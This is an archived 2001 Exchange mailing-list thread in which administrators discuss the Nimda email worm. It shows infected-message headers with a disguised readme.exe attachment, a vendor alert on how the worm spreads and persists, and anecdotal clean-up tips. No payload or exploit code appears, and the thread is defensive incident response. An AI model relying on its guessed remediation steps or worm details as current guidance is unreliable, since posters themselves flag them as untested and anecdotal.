My OWA is getting SLAMMED!! OUCH!! Thanks Russell -Original Message- From: John Matteson [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 11:32 AM To: Exchange Discussions Subject: New Virus / Worm ?? I received an E-mail from a person that I didn't know this morning, and the subject line was a lot of nonsense characters. Using Outlook 2000 I highlighted it and it kicked off the attachment, which opened Media Player and tried to play a file, but got a content error. Here is the header from the message as it was received. Anyone have any ideas about this? === Received: from COURRIER (mail.stadacona.ca [207.236.164.198]) by mx2.geac.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13) id T1K1YYZM; Tue, 18 Sep 2001 09:56:21 -0400 From: [EMAIL PROTECTED] To: Subject: Xodco0411odco0804odco040alogv040abedsnotebeclassodco0804bedsnotebootodco0407 logv0409exgu040aodco0412avco040cbootmoderatravco0411unstdllodco040clogv0404o dco040cbebsdulogv0412odco0407 MIME-Version: 1.0 Content-Type: multipart/related; type=multipart/alternative; boundary=_ABC1234567890DEF_ X-Priority: 3 X-MSMail-Priority: Normal X-Unsent: 1 --_ABC1234567890DEF_ Content-Type: multipart/alternative; boundary=_ABC0987654321DEF_ --_ABC0987654321DEF_ Content-Type: text/html; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable --_ABC0987654321DEF_-- --_ABC1234567890DEF_ Content-Type: audio/x-wav; name=readme.exe Content-Transfer-Encoding: base64 Content-ID: EA4DMGBP9p John Matteson; Exchange Manager Geac Corporate Infrastructure Systems and Standards (404) 239 - 2981 ...the words that I remember from my childhood still are true, that there are none so blind as those who will not see --The Moody Blues (I know you're out there) _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED]
RE: New Virus / Worm ??
at your own risk - reboot and remove the .eml files. seems to cure the problem but doesn't prevent re-infection. dan. _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED]
RE: New Virus / Worm ??
the eml files appear all over the hard disk, although before i deleted them all I did notice that they seemed to be in all the network shares - can't confirm now they're gone! dan. _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED]
RE: New Virus / Worm ??
I also received one from you, or the address. Open relay time? JDE -Original Message- From: Ryan Malayter [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 5:18 PM To: Exchange Discussions Subject:RE: New Virus / Worm ?? AFAIK, this infected message didn't come from me. It has my return address, but as you can see, the sending server is mail.stadacona.ca. We block all executables at the server, and I started getting bounce messages about an hour before I was even in the office. Also, nobody I've every actually email directly has bounced me a message, and I'm not seeing any outbound port 25 traffic from any machine other than my mail server. Can anyone confirm that this virus forges return addresses? The antiviral vendors appear to be behind on this one... -ryan- -Original Message- From: John Matteson [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 10:32 AM To: Exchange Discussions Subject: New Virus / Worm ?? I received an E-mail from a person that I didn't know this morning, and the subject line was a lot of nonsense characters. Using Outlook 2000 I highlighted it and it kicked off the attachment, which opened Media Player and tried to play a file, but got a content error. Here is the header from the message as it was received. Anyone have any ideas about this? === Received: from COURRIER (mail.stadacona.ca [207.236.164.198]) by mx2.geac.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13) id T1K1YYZM; Tue, 18 Sep 2001 09:56:21 -0400 From: [EMAIL PROTECTED] To: Subject: Xodco0411odco0804odco040alogv040abedsnotebeclassodco0804bedsnotebootodco0407 logv0409exgu040aodco0412avco040cbootmoderatravco0411unstdllodco040clogv0404o dco040cbebsdulogv0412odco0407 MIME-Version: 1.0 Content-Type: multipart/related; type=multipart/alternative; boundary=_ABC1234567890DEF_ X-Priority: 3 X-MSMail-Priority: Normal X-Unsent: 1 --_ABC1234567890DEF_ Content-Type: multipart/alternative; boundary=_ABC0987654321DEF_ --_ABC0987654321DEF_ Content-Type: text/html; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable --_ABC0987654321DEF_-- --_ABC1234567890DEF_ Content-Type: audio/x-wav; name=readme.exe Content-Transfer-Encoding: base64 Content-ID: EA4DMGBP9p John Matteson; Exchange Manager Geac Corporate Infrastructure Systems and Standards (404) 239 - 2981 ...the words that I remember from my childhood still are true, that there are none so blind as those who will not see --The Moody Blues (I know you're out there) _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED]
RE: New Virus / Worm ??
Please name of Worm, our Internet provider say that is greencode and suggested us to disconnected some of our servers,,,we have ALL MS patches in those servers how could tha tbe?!~ --er -Original Message- From: Ewins, James [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 9:26 AM To: Exchange Discussions Subject: RE: New Virus / Worm ?? You may wish to snip the stuff from the bottom of this thread before replying folks, it seems to be upsetting people. JDE -Original Message- From: Ewins, James [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 5:18 PM To: Exchange Discussions Subject:RE: New Virus / Worm ?? I also received one from you, or the address. Open relay time? JDE -Original Message- From: Ryan Malayter [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 5:18 PM To: Exchange Discussions Subject:RE: New Virus / Worm ?? AFAIK, this infected message didn't come from me. It has my return address, but as you can see, the sending server is mail.stadacona.ca. We block all executables at the server, and I started getting bounce messages about an hour before I was even in the office. Also, nobody I've every actually email directly has bounced me a message, and I'm not seeing any outbound port 25 traffic from any machine other than my mail server. Can anyone confirm that this virus forges return addresses? The antiviral vendors appear to be behind on this one... -ryan- -Original Message- From: John Matteson [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 10:32 AM To: Exchange Discussions Subject: New Virus / Worm ?? I received an E-mail from a person that I didn't know this morning, and the subject line was a lot of nonsense characters. Using Outlook 2000 I highlighted it and it kicked off the attachment, which opened Media Player and tried to play a file, but got a content error. Here is the header from the message as it was received. Anyone have any ideas about this? s _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED]
RE: New Virus / Worm ??
My mail server is not an open relay... and it appears stadacona.ca isn't, either. Maybe the worm itself handles the SMTP conversation? -Original Message- From: Ewins, James [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 11:18 AM To: Exchange Discussions Subject: RE: New Virus / Worm ?? I also received one from you, or the address. Open relay time? JDE -Original Message- From: Ryan Malayter [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 5:18 PM To: Exchange Discussions Subject:RE: New Virus / Worm ?? AFAIK, this infected message didn't come from me. It has my return address, but as you can see, the sending server is mail.stadacona.ca. We block all executables at the server, and I started getting bounce messages about an hour before I was even in the office. Also, nobody I've every actually email directly has bounced me a message, and I'm not seeing any outbound port 25 traffic from any machine other than my mail server. Can anyone confirm that this virus forges return addresses? The antiviral vendors appear to be behind on this one... -ryan- -Original Message- From: John Matteson [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 10:32 AM To: Exchange Discussions Subject: New Virus / Worm ?? I received an E-mail from a person that I didn't know this morning, and the subject line was a lot of nonsense characters. Using Outlook 2000 I highlighted it and it kicked off the attachment, which opened Media Player and tried to play a file, but got a content error. Here is the header from the message as it was received. Anyone have any ideas about this? === Received: from COURRIER (mail.stadacona.ca [207.236.164.198]) by mx2.geac.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13) id T1K1YYZM; Tue, 18 Sep 2001 09:56:21 -0400 From: [EMAIL PROTECTED] To: Subject: Xodco0411odco0804odco040alogv040abedsnotebeclassodco0804bedsnotebootodco0407 logv0409exgu040aodco0412avco040cbootmoderatravco0411unstdllodco040clogv0404o dco040cbebsdulogv0412odco0407 MIME-Version: 1.0 Content-Type: multipart/related; type=multipart/alternative; boundary=_ABC1234567890DEF_ X-Priority: 3 X-MSMail-Priority: Normal X-Unsent: 1 --_ABC1234567890DEF_ Content-Type: multipart/alternative; boundary=_ABC0987654321DEF_ --_ABC0987654321DEF_ Content-Type: text/html; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable --_ABC0987654321DEF_-- --_ABC1234567890DEF_ Content-Type: audio/x-wav; name=readme.exe Content-Transfer-Encoding: base64 Content-ID: EA4DMGBP9p John Matteson; Exchange Manager Geac Corporate Infrastructure Systems and Standards (404) 239 - 2981 ...the words that I remember from my childhood still are true, that there are none so blind as those who will not see --The Moody Blues (I know you're out there) _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED]
RE: New Virus / Worm ??
On the servers that were infected at our company, we found a mmc.exe that was running in c:\winnt. This appeared to be regenerating the readme.eml files. We killed the process, deleted the file, and deleted the .eml files. This appears to have worked for now. Not sure how to stop it from happening again. John Bricher Windows NT Engineer Cybear, Inc. 561-999-3549 [EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED]
RE: New Virus / Worm ??
We just sent the following to all our customers. Tom Buoniello Sybari Software, Inc. [EMAIL PROTECTED] Virus Alert: W32/Nimda.A@mm Is this a Virus that uses E-mail?: yes Virus Name: --- W32/Nimda.A@mm Alias: --- W32/Nimda-A W32/Nimda-mm E-mail Subject: --- None E-mail Body: --- None E-mail Attachments: --- README.EXE Description: --- This worm will enter a computer in one out of possibly two ways - it will either be received as an email with an attachment, and it seems that it will also attempt to break into machines running the web server software IIS (Internet Information Server), through a security hole known as a directory traversal exploit. When the file is run, it will copy itself to the system directory as a hidden file called LOAD.EXE. This file is called from the file SYSTEM.INI so that it is run from startup. At the Present time a Filter Rule for : Readme.exe (all types) will remove this from your email server We will be releasing AV Engine Updates when they are made available. Thank You, Sybari Software, Inc. More Info: --- http://www.sybari.com/alerts List Maintenance: --- http://www.sybari.com/support/support_list.asp -Original Message- From: Monteleone-Haught Matt - Millville [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 12:28 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? I got the same message. Scanmail ripped off the attachment, because I block all EXE files. Matthew Exchange Disaster Recovery, Live it, Learn It, Love It, Get yours today! http://www.microsoft.com/TechNet/exchange/technote/edrv3p1.asp Besides the technical limitations on the PST (remember the P stands for Personal, that means you're responsible not the mail admin)... Jim Schwartz 8-16-01 -Original Message- From: John Matteson [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 11:32 AM To: Exchange Discussions Subject: New Virus / Worm ?? I received an E-mail from a person that I didn't know this morning, and the subject line was a lot of nonsense characters. Using Outlook 2000 I highlighted it and it kicked off the attachment, which opened Media Player and tried to play a file, but got a content error. Here is the header from the message as it was received. Anyone have any ideas about this? === Received: from COURRIER (mail.stadacona.ca [207.236.164.198]) by mx2.geac.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13) id T1K1YYZM; Tue, 18 Sep 2001 09:56:21 -0400 From: [EMAIL PROTECTED] To: Subject: Xodco0411odco0804odco040alogv040abedsnotebeclassodco0804bedsn otebootodco0407 logv0409exgu040aodco0412avco040cbootmoderatravco0411unstdllod co040clogv0404o dco040cbebsdulogv0412odco0407 MIME-Version: 1.0 Content-Type: multipart/related; type=multipart/alternative; boundary=_ABC1234567890DEF_ X-Priority: 3 X-MSMail-Priority: Normal X-Unsent: 1 --_ABC1234567890DEF_ Content-Type: multipart/alternative; boundary=_ABC0987654321DEF_ --_ABC0987654321DEF_ Content-Type: text/html; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable --_ABC0987654321DEF_-- --_ABC1234567890DEF_ Content-Type: audio/x-wav; name=readme.exe Content-Transfer-Encoding: base64 Content-ID: EA4DMGBP9p John Matteson; Exchange Manager Geac Corporate Infrastructure Systems and Standards (404) 239 - 2981 ...the words that I remember from my childhood still are true, that there are none so blind as those who will not see --The Moody Blues (I know you're out there) _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED]
RE: New Virus / Worm ??
It's a new/variant worm, possibly related to this: http://www.zdnet.com/eweek/stories/general/0,11011,2810273,00.html W -Original Message- From: Andrew Chan [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 12:41 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? It's time to activate those Content Filter features, AGAIN... :-) Andrew, MCSE (NT W2K) + CCNA -Original Message- From: John Matteson [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 8:32 AM To: Exchange Discussions Subject: New Virus / Worm ?? I received an E-mail from a person that I didn't know this morning, and the subject line was a lot of nonsense characters. Using Outlook 2000 I highlighted it and it kicked off the attachment, which opened Media Player and tried to play a file, but got a content error. Here is the header from the message as it was received. Anyone have any ideas about this? === Received: from COURRIER (mail.stadacona.ca [207.236.164.198]) by mx2.geac.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13) id T1K1YYZM; Tue, 18 Sep 2001 09:56:21 -0400 From: [EMAIL PROTECTED] To: Subject: Xodco0411odco0804odco040alogv040abedsnotebeclassodco0804bedsnotebootodco 0407 logv0409exgu040aodco0412avco040cbootmoderatravco0411unstdllodco040clogv0 404o dco040cbebsdulogv0412odco0407 MIME-Version: 1.0 Content-Type: multipart/related; type=multipart/alternative; boundary=_ABC1234567890DEF_ X-Priority: 3 X-MSMail-Priority: Normal X-Unsent: 1 --_ABC1234567890DEF_ Content-Type: multipart/alternative; boundary=_ABC0987654321DEF_ --_ABC0987654321DEF_ Content-Type: text/html; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable --_ABC0987654321DEF_-- --_ABC1234567890DEF_ Content-Type: audio/x-wav; name=readme.exe Content-Transfer-Encoding: base64 Content-ID: EA4DMGBP9p John Matteson; Exchange Manager Geac Corporate Infrastructure Systems and Standards (404) 239 - 2981 ...the words that I remember from my childhood still are true, that there are none so blind as those who will not see --The Moody Blues (I know you're out there) _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED]
RE: New Virus / Worm ?? NAI's extra.dat
http://vil.mcafee.com/dispVirus.asp?virus_k=99209; -Original Message- From: Tom Buoniello [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 9:45 AM To: Exchange Discussions Subject: RE: New Virus / Worm ?? We just sent the following to all our customers. Tom Buoniello Sybari Software, Inc. [EMAIL PROTECTED] Virus Alert: W32/Nimda.A@mm Is this a Virus that uses E-mail?: yes Virus Name: --- W32/Nimda.A@mm Alias: --- W32/Nimda-A W32/Nimda-mm E-mail Subject: --- None E-mail Body: --- None E-mail Attachments: --- README.EXE Description: --- This worm will enter a computer in one out of possibly two ways - it will either be received as an email with an attachment, and it seems that it will also attempt to break into machines running the web server software IIS (Internet Information Server), through a security hole known as a directory traversal exploit. When the file is run, it will copy itself to the system directory as a hidden file called LOAD.EXE. This file is called from the file SYSTEM.INI so that it is run from startup. At the Present time a Filter Rule for : Readme.exe (all types) will remove this from your email server We will be releasing AV Engine Updates when they are made available. Thank You, Sybari Software, Inc. More Info: --- http://www.sybari.com/alerts List Maintenance: --- http://www.sybari.com/support/support_list.asp -Original Message- From: Monteleone-Haught Matt - Millville [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 12:28 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? I got the same message. Scanmail ripped off the attachment, because I block all EXE files. Matthew Exchange Disaster Recovery, Live it, Learn It, Love It, Get yours today! http://www.microsoft.com/TechNet/exchange/technote/edrv3p1.asp Besides the technical limitations on the PST (remember the P stands for Personal, that means you're responsible not the mail admin)... Jim Schwartz 8-16-01 -Original Message- From: John Matteson [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 11:32 AM To: Exchange Discussions Subject: New Virus / Worm ?? I received an E-mail from a person that I didn't know this morning, and the subject line was a lot of nonsense characters. Using Outlook 2000 I highlighted it and it kicked off the attachment, which opened Media Player and tried to play a file, but got a content error. Here is the header from the message as it was received. Anyone have any ideas about this? === Received: from COURRIER (mail.stadacona.ca [207.236.164.198]) by mx2.geac.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13) id T1K1YYZM; Tue, 18 Sep 2001 09:56:21 -0400 From: [EMAIL PROTECTED] To: Subject: Xodco0411odco0804odco040alogv040abedsnotebeclassodco0804bedsn otebootodco0407 logv0409exgu040aodco0412avco040cbootmoderatravco0411unstdllod co040clogv0404o dco040cbebsdulogv0412odco0407 MIME-Version: 1.0 Content-Type: multipart/related; type=multipart/alternative; boundary=_ABC1234567890DEF_ X-Priority: 3 X-MSMail-Priority: Normal X-Unsent: 1 --_ABC1234567890DEF_ Content-Type: multipart/alternative; boundary=_ABC0987654321DEF_ --_ABC0987654321DEF_ Content-Type: text/html; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable --_ABC0987654321DEF_-- --_ABC1234567890DEF_ Content-Type: audio/x-wav; name=readme.exe Content-Transfer-Encoding: base64 Content-ID: EA4DMGBP9p John Matteson; Exchange Manager Geac Corporate Infrastructure Systems and Standards (404) 239 - 2981 ...the words that I remember from my childhood still are true, that there are none so blind as those who will not see --The Moody Blues (I know you're out there) _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http
RE: New Virus / Worm ??
http://www.mcaffee.com/ right on the frontpage... heres a little more as well... http://www.wired.com/news/technology/0%2C1282%2C46944%2C00.html http:[EMAIL PROTECTED] tml -Original Message- From: Etts, Russell [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 2:51 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? Does anyone have any more info on this?? Does NAI have an update? I can't get through to them. Thanks Russell -Original Message- From: John Bricher [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 12:33 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? On the servers that were infected at our company, we found a mmc.exe that was running in c:\winnt. This appeared to be regenerating the readme.eml files. We killed the process, deleted the file, and deleted the .eml files. This appears to have worked for now. Not sure how to stop it from happening again. John Bricher Windows NT Engineer Cybear, Inc. 561-999-3549 [EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED]
RE: New Virus / Worm ??
Yes, NAI released an extra.dat Still waiting for trend to put out an update. Pete Pfefferkorn Senior Systems Engineer/Mail Administrator University of Cincinnati 51 Goodman Street Cincinnati, OH 45221 Phone - (513) 556-9076 Fax - (513) 556-2042 -Original Message- From: Etts, Russell [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 2:51 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? Does anyone have any more info on this?? Does NAI have an update? I can't get through to them. Thanks Russell -Original Message- From: John Bricher [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 12:33 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? On the servers that were infected at our company, we found a mmc.exe that was running in c:\winnt. This appeared to be regenerating the readme.eml files. We killed the process, deleted the file, and deleted the .eml files. This appears to have worked for now. Not sure how to stop it from happening again. John Bricher Windows NT Engineer Cybear, Inc. 561-999-3549 [EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED]
RE: New Virus / Worm ??
If you block EXE's there is no need to wait for updates. For more information, visit http://www.cmsconnect.com Dan -Original Message- From: Pfefferkorn, Pete (PFEFFEPE) [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 3:16 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? Yes, NAI released an extra.dat Still waiting for trend to put out an update. Pete Pfefferkorn Senior Systems Engineer/Mail Administrator University of Cincinnati 51 Goodman Street Cincinnati, OH 45221 Phone - (513) 556-9076 Fax - (513) 556-2042 -Original Message- From: Etts, Russell [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 2:51 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? Does anyone have any more info on this?? Does NAI have an update? I can't get through to them. Thanks Russell -Original Message- From: John Bricher [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 12:33 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? On the servers that were infected at our company, we found a mmc.exe that was running in c:\winnt. This appeared to be regenerating the readme.eml files. We killed the process, deleted the file, and deleted the .eml files. This appears to have worked for now. Not sure how to stop it from happening again. John Bricher Windows NT Engineer Cybear, Inc. 561-999-3549 [EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED]
RE: New Virus / Worm ??
has anybody seen anything Official about the .eml files? I've just heard anecdotal evidence about them. -Michèle Immigration site: http://LadySun1969.tripod.com Our new 2001 Miata: http://members.cardomain.com/bpituley Tiggercam: http://www.tiggercam.co.uk - Why do they put pictures of criminals up in the Post Office? What are we supposed to do . . . write to these men? Why don't they just put their pictures on the postage stamps so the mailmen could look for them while they delivered the mail? - -Original Message- From: Daniel Deward [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 3:37 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? If you block EXE's there is no need to wait for updates. For more information, visit http://www.cmsconnect.com Dan -Original Message- From: Pfefferkorn, Pete (PFEFFEPE) [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 3:16 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? Yes, NAI released an extra.dat Still waiting for trend to put out an update. Pete Pfefferkorn Senior Systems Engineer/Mail Administrator University of Cincinnati 51 Goodman Street Cincinnati, OH 45221 Phone - (513) 556-9076 Fax - (513) 556-2042 -Original Message- From: Etts, Russell [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 2:51 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? Does anyone have any more info on this?? Does NAI have an update? I can't get through to them. Thanks Russell -Original Message- From: John Bricher [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 12:33 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? On the servers that were infected at our company, we found a mmc.exe that was running in c:\winnt. This appeared to be regenerating the readme.eml files. We killed the process, deleted the file, and deleted the .eml files. This appears to have worked for now. Not sure how to stop it from happening again. John Bricher Windows NT Engineer Cybear, Inc. 561-999-3549 [EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED] _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED]
RE: New Virus / Worm ??
I heard something official from this guy I know... -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 3:37 PM To: Exchange Discussions Subject: RE: New Virus / Worm ?? has anybody seen anything Official about the .eml files? I've just heard anecdotal evidence about them. -Michèle Immigration site: http://LadySun1969.tripod.com Our new 2001 Miata: http://members.cardomain.com/bpituley Tiggercam: http://www.tiggercam.co.uk - Why do they put pictures of criminals up in the Post Office? What are we supposed to do . . . write to these men? Why don't they just put their pictures on the postage stamps so the mailmen could look for them while they delivered the mail? - _ List posting FAQ: http://www.swinc.com/resource/exch_faq.htm Archives: http://www.swynk.com/sitesearch/search.asp To unsubscribe: mailto:[EMAIL PROTECTED] Exchange List admin:[EMAIL PROTECTED]
RE: New Virus / Worm ??
